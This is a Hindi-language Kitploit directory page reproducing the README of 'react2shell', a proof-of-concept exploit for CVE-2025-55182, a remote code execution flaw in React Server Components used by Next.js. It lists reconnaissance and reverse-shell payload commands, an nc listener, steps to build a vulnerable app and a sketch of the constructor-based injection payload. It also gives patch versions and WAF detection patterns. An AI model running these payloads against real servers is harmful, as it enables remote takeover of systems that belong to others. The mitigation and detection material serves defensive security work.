Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell — भेद्यता CVE-2025-55182 का शोषण करने के लिए एक संपूर्ण फ्रेमवर्क | Kitploit
उपकरण/GitHubGitHub/zr0n/react2shell
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubzr0n/react2shell

react2shell

भेद्यता CVE-2025-55182 का शोषण करने के लिए एक संपूर्ण फ्रेमवर्क

रिपॉजिटरी देखें
10539 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell - CVE-2025-55182 शोषण PoC

Security Platform License

यह CVE-2025-55182 के लिए एक proof-of-concept शोषण है, जो React Server Components का उपयोग करने वाले Next.js अनुप्रयोगों में एक गंभीर Remote Code Execution भेद्यता है।

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है।

  • ❌ उन प्रणालियों के विरुद्ध उपयोग न करें जिनके मालिक आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है
  • ❌ कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है
  • ✅ केवल नियंत्रित वातावरण में सीखने और अधिकृत पैठ परीक्षण के लिए उपयोग करें
  • ✅ लेखक इस टूल के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है

📋 भेद्यता विवरण

  • CVE ID: CVE-2025-55182
  • भेद्यता: React Server Components में Remote Code Execution
  • प्रभावित संस्करण:
    • Next.js: ≥14.3.0-canary.77, App Router के साथ सभी 15.x और 16.x संस्करण
    • React: 19.0, 19.1.0, 19.1.1, 19.2.0
  • पैच किए गए संस्करण:
    • Next.js: 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, 15.0.5
  • React: 19.0.1, 19.1.2, 19.2.1
  • CVSS स्कोर: गंभीर
  • हमला वेक्टर: नेटवर्क-आधारित, तैयार किए गए POST अनुरोध की आवश्यकता है
  • 🎯 विशेषताएँ

    • ✅ क्रॉस-प्लेटफ़ॉर्म समर्थन (Windows और Linux)
    • ✅ एकाधिक पेलोड प्रकार
    • ✅ रिवर्स शेल क्षमताएँ
    • ✅ विज़ुअल प्रूफ पेलोड (calc, notepad)
    • ✅ फ़ाइल सिस्टम संचालन
    • ✅ सिस्टम जानकारी एकत्र करना

    🔧 स्थापना

    root@kitploit:~
    # Clone or download this repository
    git clone https://github.com/zr0n/react2shell
    cd react2shell
    
    # Install dependencies
    npm install form-data
    

    💻 उपयोग

    मूल वाक्यविन्यास

    root@kitploit:~
    node react2shell.js <target_url> <payload_type> [options]
    

    उपलब्ध पेलोड

    पेलोडविवरणउदाहरण
    basicगणितीय proof of concept (7*7+1=50)node react2shell.js http://target:3000 basic
    whoamiवर्तमान सिस्टम उपयोगकर्ता दिखाएँnode react2shell.js http://target:3000 whoami
    dirवर्तमान निर्देशिका की सामग्री सूचीबद्ध करेंnode react2shell.js http://target:3000 dir
    systeminfoऑपरेटिंग सिस्टम जानकारी दिखाएँnode react2shell.js http://target:3000 systeminfo
    fileEXPLOITED.txt प्रूफ फ़ाइल बनाएँnode react2shell.js http://target:3000 file
    calcकैलकुलेटर लॉन्च करें (Windows विज़ुअल प्रूफ)node react2shell.js http://target:3000 calc
    notepadनोटपैड लॉन्च करें (Windows विज़ुअल प्रूफ)node react2shell.js http://target:3000 notepad
    shellरिवर्स शेल (Windows/Linux स्वतः पहचान)node react2shell.js http://target:3000 shell 10.10.10.5 4444

    उदाहरण

    1. बुनियादी Proof of Concept

    root@kitploit:~
    node react2shell.js http://localhost:3000 basic
    # Check server console for output: EXPLOITED: 50
    

    2. सिस्टम टोही

    root@kitploit:~
    # Get current user
    node react2shell.js http://localhost:3000 whoami
    
    # List files
    node react2shell.js http://localhost:3000 dir
    
    # System information
    node react2shell.js http://localhost:3000 systeminfo
    

    3. विज़ुअल प्रूफ (Windows)

    root@kitploit:~
    # Launch calculator
    node react2shell.js http://localhost:3000 calc
    
    # Launch notepad
    node react2shell.js http://localhost:3000 notepad
    

    4. फ़ाइल निर्माण प्रूफ

    root@kitploit:~
    node react2shell.js http://localhost:3000 file
    # Check server directory for EXPLOITED.txt
    

    5. रिवर्स शेल

    root@kitploit:~
    # Terminal 1: Start listener
    nc -lvnp 4444
    
    # Terminal 2: Execute exploit
    node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
    
    # Works on both Windows (PowerShell) and Linux (Bash)
    

    🏗️ भेद्य वातावरण की स्थापना

    पूर्वापेक्षाएँ

    • Node.js 18+
    • npm या yarn

    भेद्य Next.js अनुप्रयोग बनाएँ

    root@kitploit:~
    # Create project directory
    mkdir vulnerable-nextjs-app
    cd vulnerable-nextjs-app
    
    # Initialize Next.js with vulnerable version
    npx create-next-app@latest . --ts --app --no-eslint --tailwind
    
    # Downgrade to vulnerable version
    npm install [email protected]
    
    # Install dependencies
    npm install
    

    न्यूनतम भेद्य ऐप (app/page.tsx)

    root@kitploit:~
    export default function Home() {
      return (
        <div className="p-8">
          <h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
          <p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
        </div>
      );
    }
    

    सर्वर प्रारंभ करें

    root@kitploit:~
    npm run dev
    # Server runs on http://localhost:3000
    

    🔍 यह कैसे काम करता है

    यह शोषण React Server Components में एक deserialization भेद्यता का लाभ उठाता है:

    1. पेलोड निर्माण: प्रोटोटाइप प्रदूषण के साथ एक दुर्भावनापूर्ण क्रमबद्ध वस्तु बनाता है
    2. Function Constructor एक्सेस: Function Constructor तक पहुँचने के लिए constructor.constructor का शोषण करता है
    3. कोड इंजेक्शन: _prefix फ़ील्ड के माध्यम से मनमाना JavaScript कोड इंजेक्ट करता है
    4. निष्पादन: सर्वर पेलोड को deserialize करता है और इंजेक्ट किए गए कोड को निष्पादित करता है

    तकनीकी विवरण

    root@kitploit:~
    // Simplified vulnerability chain
    {
      _formData: {
        get: '$3:constructor:constructor' // Access Function constructor
      },
      _prefix: 'YOUR_CODE_HERE//' // Injected code
    }
    

    🛡️ शमन

    अनुप्रयोग स्वामियों के लिए

    1. तुरंत अपडेट करें:

      root@kitploit:~
      npm update next@latest
      npm update react@latest react-dom@latest
      
    2. पैच किए गए संस्करण सत्यापित करें:

      root@kitploit:~
      npm list next react
      
    3. आवश्यक संस्करण:

      • Next.js: ≥16.0.7 या ≥15.5.7
      • React: ≥19.2.1 या ≥19.1.2

    सुरक्षा टीमों के लिए

    • अपने इंफ्रास्ट्रक्चर में भेद्य Next.js संस्करणों के लिए स्कैन करें
    • दुर्भावनापूर्ण RSC पेलोड का पता लगाने के लिए Web Application Firewall (WAF) नियम लागू करें
    • next-action हेडर वाले संदिग्ध POST अनुरोधों की निगरानी करें
    • अप्रत्याशित कोड निष्पादन पैटर्न के लिए सर्वर-साइड लॉग की समीक्षा करें

    📊 पता लगाना

    WAF नियम

    निम्नलिखित के साथ POST अनुरोधों की तलाश करें:

    • हेडर: next-action
    • Content-Type: multipart/form-data
    • बॉडी जिसमें शामिल है: constructor, _prefix, _formData

    लॉग पैटर्न

    root@kitploit:~
    POST / with next-action header
    Suspicious FormData keys: 0, 1, 2, 3, 4
    Response: 200 (successful exploitation) or 500 (failed)
    

    📚 संदर्भ

    • CVE-2025-55182 - NVD
    • Next.js Security Advisories
    • React Security Updates
    • OWASP Code Injection

    🤝 योगदान

    यह एक शैक्षिक उपकरण है। ऐसे योगदान जो निम्नलिखित में सुधार करते हैं:

    • पता लगाने की क्षमताएँ
    • दस्तावेज़ीकरण
    • रक्षात्मक रणनीतियाँ
    • शैक्षिक सामग्री

    का स्वागत है। ऐसे योगदान जमा न करें जो आक्रमण क्षमताओं को बढ़ाते हैं।

    📜 लाइसेंस

    केवल शैक्षिक उपयोग - कोई वारंटी प्रदान नहीं की जाती है

    👤 लेखक

    Luiz Fernando Ziron साइबर सुरक्षा शिक्षा और जागरूकता उद्देश्यों के लिए बनाया गया।

    ⚖️ कानूनी नोटिस

    इस टूल का उपयोग करके, आप निम्नलिखित के लिए सहमत हैं:

    • इसका उपयोग केवल उन प्रणालियों पर करें जिनके मालिक आप हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है
    • अपने कार्यों की पूरी जिम्मेदारी लें
    • लेखक को किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी न ठहराएँ
    • सभी लागू कानूनों और विनियमों का पालन करें

    अधिकांश क्षेत्राधिकारों में कंप्यूटर प्रणालियों तक अनधिकृत पहुँच एक अपराध है।


    सुरक्षित रहें, नैतिक रहें, कानूनी रहें। 🔒

    टूल डाउनलोड करें